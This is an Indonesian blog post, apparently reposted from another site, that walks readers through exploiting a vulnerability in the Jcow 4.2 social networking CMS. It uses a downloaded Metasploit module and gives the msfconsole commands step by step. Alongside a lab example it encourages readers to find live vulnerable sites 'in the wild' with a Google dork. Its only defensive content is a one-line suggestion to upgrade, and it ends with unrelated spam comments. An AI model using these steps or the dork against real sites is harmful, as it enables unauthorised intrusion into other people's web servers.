Apakah teman-teman pernah melihat CMS yang satu ini?
Jcow
social networking…Ya, memang demikian namanya… Jcow menawarkan aplikasi
berbasis web untuk situs jejaring sosial secara gratis alias free dan
bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil
hanya 777KB tidak lebih dari 1 MB.
Tapi
disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow
ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability
dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4
langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).
Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94…
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab
terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the
wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)
O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2
Pada artikel ini juga saya sebelumnya sudah membuat username : “victim dan password :”victim” pada aplikasi Jcow target.
Oke kita mulai langkah demi langkahnya dibawah ini
Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb (link mediafire di website asalnya)
Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.
2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.
msf > use exploit/remote/jcow
3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.
msf exploit(jcow) > set rhost 192.168.8.94 –> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim –> set username
username => victim
msf exploit(jcow) > set password victim –> set password
password => victim
4.
Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah
terakhir tinggal menjalankan perintah exploit pada konsol metasploit.
Berhasil
Pengamanan :
1. Upgrade Jcow ke versi terbaru
Sumber : vishnuvalentino.com
Monday 9 January 2012
January 09, 2012
MR: EDITOR
Unknown
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.
Related Posts
COMMENT!
Subscribe to:
Post Comments (Atom)
Herzlichen dank für die Ausführliche Beschreibung echt einige
ReplyDeletegute Topics wieder dabei. Ich teile deinen Beitrag auf jeden Fall bei Facebook und LinkedIn
Thanks designed for sharing such a good thinking, article
ReplyDeleteis pleasant, thats why i have read it fully
First off I want to say wonderful blog! I had a quick question which I'd like to ask if you do not mind.
ReplyDeleteI was curious to fiind out how you center yourself and clear your thoughts
prior to writing. I have had a hard time clearig
my thoughts in getting my thoughts oout there.
I do enjoy writing bbut it just seems like the first 10 to 15 minutes are usually wssted simply just trying too figure out
how to begin. Any suggestions or tips? Thanks!
It's going to be finish of mine day, however before end I am reading this enormous
ReplyDeletearticle to increase my knowledge.
Pretty! This was a really wonderful article. Thank you for providing these
ReplyDeletedetails.
Hello there! This post couldn't be written much better!
ReplyDeleteGoing through this post reminds me of my previous roommate!
He constantly kept talking about this. I will forward this information to him.
Pretty sure he's going to have a very good read. Thank you for sharing!